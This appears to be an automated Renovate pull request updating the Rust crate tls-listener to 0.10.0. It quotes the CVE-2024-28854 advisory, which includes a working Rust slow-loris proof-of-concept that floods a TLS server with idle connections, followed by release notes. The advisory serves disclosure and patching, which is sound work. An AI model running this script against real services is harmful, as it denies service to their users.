fix(deps): update rust crate tls-listener to 0.10.0 [security]

[renovate-bot]

This PR contains the following updates:

Package	Type	Update	Change
tls-listener	dependencies	minor	0.5.1 -> 0.10.0

GitHub Vulnerability Alerts

CVE-2024-28854

Summary

With the default configuration of tls-listener, a malicious user can open 6.4 TcpStreams a second, sending 0 bytes, and can trigger a DoS.

Details

The default configuration options make any public service using TlsListener::new() vulnerable to a slow-loris DoS attack.

/// Default number of concurrent handshakes
pub const DEFAULT_MAX_HANDSHAKES: usize = 64;
/// Default timeout for the TLS handshake.
pub const DEFAULT_HANDSHAKE_TIMEOUT: Duration = Duration::from_secs(10);

PoC

Running the HTTP TLS server example: https://github.com/tmccombs/tls-listener/blob/6c57dea2d9beb1577ae4d80f6eaf03aad4ef3857/examples/http.rs, then running the following script will prevent new connections to the server.

use std::{net::ToSocketAddrs, time::Duration};
use tokio::{io::AsyncReadExt, net::TcpStream, task::JoinSet};

#[tokio::main]
async fn main() {
    const N: usize = 1024;
    const T: Duration = Duration::from_secs(10);

    let url = "127.0.0.1:3000";
    let sockets: Vec<_> = url
        .to_socket_addrs()
        .unwrap()
        .inspect(|s| println!("{s:?}"))
        .collect();

    let mut js = JoinSet::new();

    let mut int = tokio::time::interval(T / (N as u32) / (sockets.len() as u32));
    int.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Burst);
    for _ in 0..10000 {
        for &socket in &sockets {
            int.tick().await;
            js.spawn(async move {
                let mut stream = TcpStream::connect(socket).await.unwrap();
                let _ = tokio::time::timeout(T, stream.read_to_end(&mut Vec::new())).await;
            });
        }
    }

    while js.join_next().await.is_some() {}
}

Impact

This is an instance of a slow-loris attack. This impacts any publically accessible service using the default configuration of tls-listener

Mitigation

Previous versions can mitigate this by passing a large value, such as usize::MAX as the parameter to Builder::max_handshakes.

---

Release Notes

tmccombs/tls-listener (tls-listener)

v0.10.0

Compare Source

Security Advisory

Versions prior to this using the default configuration are vulnerable to a Slowloris attack.

This version mitigates the vulnerability.

Previous versions can mitigate the vulnerability by increasing the value passed to Builder::max_handshakes to a large
number (such as usize::MAX). Decreasing the handshake_timeout can also help, although it is still strongly recommended
to increase the max_handshakes more than the current default.

Changes

• [breaking] Change poll_accept not to have a limit on the number of pending handshakes in the queue,
  so that connections that are not making progress towards completing the handshake will not block other
  connections from being accepted. This replaces Builder::max_handshakes with Builder::accept_batch_size.

v0.9.1

Compare Source

Miscellaneous Tasks

• Update tokio-rustls

v0.9.0

Compare Source

Features

• [breaking] Remove until & remove option from accept
  • BREAKING CHANGE: remove until from AsyncAccept trait. Use
    StreamExt.take_until on the TlsListener instead.
  • BREAKING CHANGE: accept fn on AsyncAccept trait no longer returns an
    Option
  • BREAKING CHANGE: accept fn on TlsListener no longer returns an Option

Upgrade

• [breaking] Update to hyper 1.0
  • BREAKING CHANGE: Removed hyper-h1 and hyper-h2 features

v0.8.0

Compare Source

This is a backwards incompatible release. The main change is that accepting a new connection now returns a tuple of the new connection, and the peer
address. The AsyncAccept trait was also changed similarly. The Error enum was also changed to provide more details about the error. And if
the handshake times out, it now returns an error instead of silently waiting for the next connection.

Features

• [breaking] Add a new error type for handshake timeouts

  • BREAKING CHANGE: Adds a new variant to the Error Enum
  • BREAKING CHANGE: The Error enum is now non_exhaustive
  • BREAKING CHANGE: Now returns an error if a handshake times out

• [breaking] Yield remote address upon accepting a connection, and include it in errors.

  • BREAKING CHANGE: The enum variant Error::ListenerError is now struct-like instead of tuple-like, and is non_exhaustive like the enum itself.
  • BREAKING CHANGE: Error now has three type parameters, not two.
  • BREAKING CHANGE: TlsListener::accept and <TlsListener as Stream>::next yields a tuple of (connection, remote address), not just the connection.
  • BREAKING CHANGE: AsyncAccept now has an associated type Address, which poll_accept must now return along with the accepted connection.

• [breaking] More changes for including peer address in response

  • BREAKING CHANGE: AsyncAccept::Error must implement std::error::Error
  • BREAKING CHANGE: TlsAcceptError is now a struct form variant.

v0.7.0

Compare Source

Changed

• Increase tokio-rustls version to 0.24.0

v0.6.0

Compare Source

Added

• Added additional tests and examples
• Re-export tls engine crates as public modules.

Changed

• Increased default handshake timeout to 10 seconds (technically a breaking change)

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.